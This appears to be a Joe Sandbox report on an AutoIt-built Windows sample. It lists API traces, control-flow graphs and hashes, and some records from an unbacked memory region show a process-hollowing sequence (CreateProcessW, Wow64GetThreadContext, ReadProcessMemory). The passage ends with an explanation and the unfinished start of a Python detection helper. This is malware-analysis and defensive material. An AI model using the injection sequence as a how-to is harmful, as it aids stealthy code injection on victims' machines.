                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001DECF1
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001DED32
                                                            • RegCloseKey.ADVAPI32(?), ref: 001DED70
                                                            • _wcscat.LIBCMT ref: 001DEDC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 2673923337-2727554177
                                                            • Opcode ID: 2005eea4800439b3a6df16c886cfc464b830fef88f585669464f030c151c6267
                                                            • Instruction ID: f791f104e4771e06e45ec9c4470c261e7d749ba25c3b6a7bd68ab64d9337fea7
                                                            • Opcode Fuzzy Hash: 2005eea4800439b3a6df16c886cfc464b830fef88f585669464f030c151c6267
                                                            • Instruction Fuzzy Hash: 687190714183019EC714EF65FC9599BBBF8FFA9704F40452EF845872A0EB709A48CBA2

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 760 1a3633-1a3681 762 1a3683-1a3686 760->762 763 1a36e1-1a36e3 760->763 764 1a3688-1a368f 762->764 765 1a36e7 762->765 763->762 766 1a36e5 763->766 770 1a375d-1a3765 PostQuitMessage 764->770 771 1a3695-1a369a 764->771 768 1dd31c-1dd34a call 1b11d0 call 1b11f3 765->768 769 1a36ed-1a36f0 765->769 767 1a36ca-1a36d2 DefWindowProcW 766->767 777 1a36d8-1a36de 767->777 807 1dd34f-1dd356 768->807 772 1a36f2-1a36f3 769->772 773 1a3715-1a373c SetTimer RegisterWindowMessageW 769->773 778 1a3711-1a3713 770->778 774 1dd38f-1dd3a3 call 202a16 771->774 775 1a36a0-1a36a2 771->775 779 1dd2bf-1dd2c2 772->779 780 1a36f9-1a370c KillTimer call 1a44cb call 1a3114 772->780 773->778 781 1a373e-1a3749 CreatePopupMenu 773->781 774->778 801 1dd3a9 774->801 782 1a36a8-1a36ad 775->782 783 1a3767-1a3776 call 1a4531 775->783 778->777 786 1dd2f8-1dd317 MoveWindow 779->786 787 1dd2c4-1dd2c6 779->787 780->778 781->778 789 1dd374-1dd37b 782->789 790 1a36b3-1a36b8 782->790 783->778 786->778 795 1dd2c8-1dd2cb 787->795 796 1dd2e7-1dd2f3 SetFocus 787->796 789->767 798 1dd381-1dd38a call 1f817e 789->798 799 1a374b-1a375b call 1a45df 790->799 800 1a36be-1a36c4 790->800 795->800 803 1dd2d1-1dd2e2 call 1b11d0 795->803 796->778 798->767 799->778 800->767 800->807 801->767 803->778 807->767 808 1dd35c-1dd36f call 1a44cb call 1a43db 807->808 808->767
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 001A36D2
                                                            • KillTimer.USER32(?,00000001), ref: 001A36FC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001A371F
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001A372A
                                                            • CreatePopupMenu.USER32 ref: 001A373E
                                                            • PostQuitMessage.USER32(00000000), ref: 001A375F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated$%#
                                                            • API String ID: 129472671-3931851844
                                                            • Opcode ID: 51770424c511bf2327e4f05d9b4a483bd856b1a2a8ccf798557a98ccc9bd2856
                                                            • Instruction ID: 4b76887df78fb4e3fcbe456fc17f188de57a39958aa985aaae28af860ed52259
                                                            • Opcode Fuzzy Hash: 51770424c511bf2327e4f05d9b4a483bd856b1a2a8ccf798557a98ccc9bd2856
                                                            • Instruction Fuzzy Hash: 39415CF9200205BBDF285FB8FD4DB7A3765EB12300F140239F922962B1CBA49F5597A1

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 001A3A62
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 001A3A71
                                                            • LoadIconW.USER32(00000063), ref: 001A3A88
                                                            • LoadIconW.USER32(000000A4), ref: 001A3A9A
                                                            • LoadIconW.USER32(000000A2), ref: 001A3AAC
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001A3AD2
                                                            • RegisterClassExW.USER32(?), ref: 001A3B28
                                                              • Part of subcall function 001A3041: GetSysColorBrush.USER32(0000000F), ref: 001A3074
                                                              • Part of subcall function 001A3041: RegisterClassExW.USER32(00000030), ref: 001A309E
                                                              • Part of subcall function 001A3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001A30AF
                                                              • Part of subcall function 001A3041: InitCommonControlsEx.COMCTL32(?), ref: 001A30CC
                                                              • Part of subcall function 001A3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001A30DC
                                                              • Part of subcall function 001A3041: LoadIconW.USER32(000000A9), ref: 001A30F2
                                                              • Part of subcall function 001A3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001A3101
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 086fbfdf4f9975bdd6e54c84aa0c175a574a2443bb66f0589b5ad1ec4b9ea325
                                                            • Instruction ID: 72e1d03322e0ad825009f0084ac877b84495867f7c45c2f8a02e16e83dce5e82
                                                            • Opcode Fuzzy Hash: 086fbfdf4f9975bdd6e54c84aa0c175a574a2443bb66f0589b5ad1ec4b9ea325
                                                            • Instruction Fuzzy Hash: 67210671940308FBEB509FA4FD5DB9D7FB5EB08711F00812AF904A62A0D7F656548F94

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b&
                                                            • API String ID: 1825951767-2560068738
                                                            • Opcode ID: f62a1e655cb09d53151212cfd547d418233fc279771166fd682fe03ed9b8c721
                                                            • Instruction ID: 709e0b248885baea49808d20a6c6f2ef9303fe965f68480907b4c84c14813f3a
                                                            • Opcode Fuzzy Hash: f62a1e655cb09d53151212cfd547d418233fc279771166fd682fe03ed9b8c721
                                                            • Instruction Fuzzy Hash: 18A14279D10229AACF04EFE0DC95EEEB778BF26300F54052AF416A7191EF749A45CB60

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001C03D3
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 001C03DB
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001C03E6
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001C03F1
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 001C03F9
                                                              • Part of subcall function 001C03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 001C0401
                                                              • Part of subcall function 001B6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,001AFA90), ref: 001B62B4
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001AFB2D
                                                            • OleInitialize.OLE32(00000000), ref: 001AFBAA
                                                            • CloseHandle.KERNEL32(00000000), ref: 001E49F2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID: <g&$\d&$%#$c&
                                                            • API String ID: 1986988660-182561653
                                                            • Opcode ID: 4ca00b3e3f557ab7fa4fb3a7de594a9424edac4f91d2c81d01ffbc81688effeb
                                                            • Instruction ID: d68632ed939473c3e0fecb212f2c86ff1f68b69611e97d7f03fd6f554ebbdc3a
                                                            • Opcode Fuzzy Hash: 4ca00b3e3f557ab7fa4fb3a7de594a9424edac4f91d2c81d01ffbc81688effeb
                                                            • Instruction Fuzzy Hash: B181A8B49112809EC3A4DF69F94D625BBF5EBA9708F10C17ED019C7362EBB18465CFA0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 983 34d25c0-34d266e call 34d0000 986 34d2675-34d269b call 34d34d0 CreateFileW 983->986 989 34d269d 986->989 990 34d26a2-34d26b2 986->990 991 34d27ed-34d27f1 989->991 998 34d26b9-34d26d3 VirtualAlloc 990->998 999 34d26b4 990->999 992 34d2833-34d2836 991->992 993 34d27f3-34d27f7 991->993 995 34d2839-34d2840 992->995 996 34d27f9-34d27fc 993->996 997 34d2803-34d2807 993->997 1002 34d2895-34d28aa 995->1002 1003 34d2842-34d284d 995->1003 996->997 1004 34d2809-34d2813 997->1004 1005 34d2817-34d281b 997->1005 1000 34d26da-34d26f1 ReadFile 998->1000 1001 34d26d5 998->1001 999->991 1006 34d26f8-34d2738 VirtualAlloc 1000->1006 1007 34d26f3 1000->1007 1001->991 1010 34d28ac-34d28b7 VirtualFree 1002->1010 1011 34d28ba-34d28c2 1002->1011 1008 34d284f 1003->1008 1009 34d2851-34d285d 1003->1009 1004->1005 1012 34d281d-34d2827 1005->1012 1013 34d282b 1005->1013 1014 34d273f-34d275a call 34d3720 1006->1014 1015 34d273a 1006->1015 1007->991 1008->1002 1016 34d285f-34d286f 1009->1016 1017 34d2871-34d287d 1009->1017 1010->1011 1012->1013 1013->992 1023 34d2765-34d276f 1014->1023 1015->991 1019 34d2893 1016->1019 1020 34d287f-34d2888 1017->1020 1021 34d288a-34d2890 1017->1021 1019->995 1020->1019 1021->1019 1024 34d2771-34d27a0 call 34d3720 1023->1024 1025 34d27a2-34d27b6 call 34d3530 1023->1025 1024->1023 1030 34d27b8 1025->1030 1031 34d27ba-34d27be 1025->1031 1030->991 1033 34d27ca-34d27ce 1031->1033 1034 34d27c0-34d27c4 FindCloseChangeNotification 1031->1034 1035 34d27de-34d27e7 1033->1035 1036 34d27d0-34d27db VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 034D2691
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 034D28B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701993742.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_34d0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                            • Instruction ID: 571d04a7796085dfc1aa76dd9e30e7641952e1fd3803872d92c554707c2b373c
                                                            • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                            • Instruction Fuzzy Hash: D7A10A74E00209EBDB14CFA4C9A4BEEB7B5FF48304F14859AE511BB280D7B59A41CF64

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1114 1a39e7-1a3a57 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001A3A15
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001A3A36
                                                            • ShowWindow.USER32(00000000,?,?), ref: 001A3A4A
                                                            • ShowWindow.USER32(00000000,?,?), ref: 001A3A53
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: eda7623189a4a25cff0efdf3b0f7788c35e77dac2be932a7f23212de142f205a
                                                            • Instruction ID: b3ffeb6a55ca73a918eec67abff0267898c5e92a15246d4584600d882980b895
                                                            • Opcode Fuzzy Hash: eda7623189a4a25cff0efdf3b0f7788c35e77dac2be932a7f23212de142f205a
                                                            • Instruction Fuzzy Hash: EAF0D4716412A0BEEB711B67BC5DE676E7DE7C6F50F00813AFD04A21B0C6E61851DAB0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1115 34d23b0-34d24c0 call 34d0000 call 34d22a0 CreateFileW 1122 34d24c7-34d24d7 1115->1122 1123 34d24c2 1115->1123 1126 34d24de-34d24f8 VirtualAlloc 1122->1126 1127 34d24d9 1122->1127 1124 34d2577-34d257c 1123->1124 1128 34d24fc-34d2513 ReadFile 1126->1128 1129 34d24fa 1126->1129 1127->1124 1130 34d2515 1128->1130 1131 34d2517-34d2551 call 34d22e0 call 34d12a0 1128->1131 1129->1124 1130->1124 1136 34d256d-34d2575 ExitProcess 1131->1136 1137 34d2553-34d2568 call 34d2330 1131->1137 1136->1124 1137->1136
                                                            APIs
                                                              • Part of subcall function 034D22A0: Sleep.KERNELBASE(000001F4), ref: 034D22B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 034D24B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701993742.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_34d0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: D7B1FIWHH0JCD7RF
                                                            • API String ID: 2694422964-3059270100
                                                            • Opcode ID: 3e2e3d7817fe1b2579be4b7ccdd8c51af18466f4c47a8fbf8ae7ad50f8884792
                                                            • Instruction ID: c050ced9873111af92567225acb073236ede527761651ca932f7192fddd923db
                                                            • Opcode Fuzzy Hash: 3e2e3d7817fe1b2579be4b7ccdd8c51af18466f4c47a8fbf8ae7ad50f8884792
                                                            • Instruction Fuzzy Hash: A0516171D14249EAEF11DBA4C824BEFBB79AF45300F004599E6087B2C0D7B91B45CBA9

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1139 1a410d-1a4123 1140 1a4129-1a413e call 1a7b76 1139->1140 1141 1a4200-1a4204 1139->1141 1144 1dd5dd-1dd5ec LoadStringW 1140->1144 1145 1a4144-1a4164 call 1a7d2c 1140->1145 1148 1dd5f7-1dd60f call 1a7c8e call 1a7143 1144->1148 1145->1148 1149 1a416a-1a416e 1145->1149 1159 1a417e-1a41fb call 1c3020 call 1a463e call 1c2ffc Shell_NotifyIconW call 1a5a64 1148->1159 1160 1dd615-1dd633 call 1a7e0b call 1a7143 call 1a7e0b 1148->1160 1151 1a4174-1a4179 call 1a7c8e 1149->1151 1152 1a4205-1a420e call 1a81a7 1149->1152 1151->1159 1152->1159 1159->1141 1160->1159
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001DD5EC
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            • _memset.LIBCMT ref: 001A418D
                                                            • _wcscpy.LIBCMT ref: 001A41E1
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001A41F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                            • String ID: Line:
                                                            • API String ID: 3942752672-1585850449
                                                            • Opcode ID: 76fe28aee6c202273d4ee237a1106ba19b8cf84851b9f450450a02636a1ada55
                                                            • Instruction ID: a46c78af92b20559529dc259a6c667ee44e5e64063a4b93508ac34cc83800328
                                                            • Opcode Fuzzy Hash: 76fe28aee6c202273d4ee237a1106ba19b8cf84851b9f450450a02636a1ada55
                                                            • Instruction Fuzzy Hash: C431E275008304ABD361EB60EC4AFDB77ECAFA6310F10451EF585920E1EBB0A749CB92
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1559183368-0
                                                            • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction ID: ccb594a7cfb79168571b634606c64d3739057f299043e8484caec1fa61885a89
                                                            • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                            • Instruction Fuzzy Hash: 06518371A00B15DBDB248FA98884F6E77A3AF60324FA4872DF825962D0D770EDD08B50
                                                            APIs
                                                              • Part of subcall function 001A4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,002662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001A4F6F
                                                            • _free.LIBCMT ref: 001DE68C
                                                            • _free.LIBCMT ref: 001DE6D3
                                                              • Part of subcall function 001A6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 001A6D0D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _free$CurrentDirectoryLibraryLoad
                                                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                            • API String ID: 2861923089-1757145024
                                                            • Opcode ID: 73657cf6088ea9d55041d29277f676da50fa441a9f4eea237ef45e22c2b4808d
                                                            • Instruction ID: e66c27b5ce9d3e9fd0309dd4d9e64a1a0173ff74a6d4a5f55578cdb94be2dce8
                                                            • Opcode Fuzzy Hash: 73657cf6088ea9d55041d29277f676da50fa441a9f4eea237ef45e22c2b4808d
                                                            • Instruction Fuzzy Hash: EA918D75910219AFCF04EFA4CC919EDB7B4FF29314F14442AF816AB2A1EB70E915CB60
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,001A35A1,SwapMouseButtons,00000004,?), ref: 001A35D4
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,001A35A1,SwapMouseButtons,00000004,?,?,?,?,001A2754), ref: 001A35F5
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,001A35A1,SwapMouseButtons,00000004,?,?,?,?,001A2754), ref: 001A3617
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                             • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: f9b7228f2b640f25147f9dde08cbba9fd0da58d55c9a3a861fbac34d5b4f9b13
                                                            • Instruction ID: eaaa1a9ab2186cab65792fcee3b0f84d6a3b061012dc75f0626fa055ff03d398
                                                            • Opcode Fuzzy Hash: f9b7228f2b640f25147f9dde08cbba9fd0da58d55c9a3a861fbac34d5b4f9b13
                                                            • Instruction Fuzzy Hash: 14114879910208BFDB208FA4EC44EAFB7B8EF05740F01546AF809D7210E3719F419B60
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 034D1A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 034D1AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 034D1B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701993742.00000000034D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_34d0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                            • Instruction ID: 00eac28f4977dfc296ad89944f7d44123eb9fa3079c039cbb42ce1701cede94e
                                                            • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                            • Instruction Fuzzy Hash: B1622B30A14258DBEB24CFA4C850BDEB376EF58700F1091A9D50DEB394E7769E81CB59
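The record above is the classic preamble of process hollowing: CreateProcessW, then Wow64GetThreadContext on the new process's thread, then a 4-byte ReadProcessMemory, all emitted from the 034D0000 region that the report marks as not backed by a PE image. The report prints 00010007 in the context argument slot, which is the x86 CONTEXT_FULL value (CONTEXT_i386 | CONTROL | INTEGER | SEGMENTS from winnt.h). The Python below is an added example, not code from the report or from the sample: it parses API lines in the report's own print format and applies that three-stage pattern to them. The parsing regex, the stage sets, the result field names and the constructed sample lines are this example's own assumptions.

```python
"""Triage helper for API records in a Joe Sandbox 'hcaresult' listing.

Added example; not code from the report or the sample. Parses lines such as
    • CreateProcessW.KERNELBASE(?,00000000), ref: 034D1A5B
and flags the hollowing preamble CreateProcess -> (Wow64)GetThreadContext ->
ReadProcessMemory when emitted from a region marked 'based on PE: false'.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# x86 CONTEXT flag bits (winnt.h). CONTEXT_FULL for x86 is
# CONTEXT_i386 | CONTROL | INTEGER | SEGMENTS == 0x00010007.
CONTEXT_I386 = 0x00010000
_CONTEXT_BITS = {
    0x01: "CONTEXT_CONTROL",
    0x02: "CONTEXT_INTEGER",
    0x04: "CONTEXT_SEGMENTS",
    0x08: "CONTEXT_FLOATING_POINT",
    0x10: "CONTEXT_DEBUG_REGISTERS",
    0x20: "CONTEXT_EXTENDED_REGISTERS",
}

# Assumed line format: optional bullet, optional 'Part of subcall function X:',
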